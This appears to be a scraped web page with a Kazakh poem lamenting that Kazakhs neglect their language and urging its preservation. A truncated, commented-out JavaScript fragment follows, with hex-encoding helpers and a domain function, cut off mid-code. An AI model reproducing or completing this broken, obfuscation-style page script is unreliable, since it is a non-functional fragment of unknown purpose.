Неге қазақ сөйлемейді қазақша?

Неге қазақ сөйлемейді қазақша,
Ана тілде сөйлеу қазір мазақ па?
Шұбарлатып өзге тілді қостырмай,
Төл тіліңді құрметте де ардақта!

Төл тіліңді құрметте де ардақта,
Қазақ тілін насихатта жан-жаққа.
Мәртебесін жоғалтса ана тілің
Құрып кетер,қаласың сонда азапта.

Құрып кетер,қаласың сонда азапта,
Ана тілің жетелдеді азатқа.
Тарихы бар өшпейтұғын мәңгілік,
Қазақ тілін сақтаңдаршы,қазақтар!

Қазақ тілін сақтаңдаршы, қазақтар!
Тіл бар жерде тірлік пенен бірлік бар.
Өз тіліңді білмейтұғын жүрсеңдер,
Қоғамың да бір-ақ сәтте құлдырар.

Қоғамың да бір-ақ сәтте құлдырар,
Аманатсыз қалар болашақ,ұл-қыздар.
Неге қазақ сөйлемейді қазақша,
Ана тілде сөйлеу қазір мазақ па?

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "massaget.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e



Бөлісу: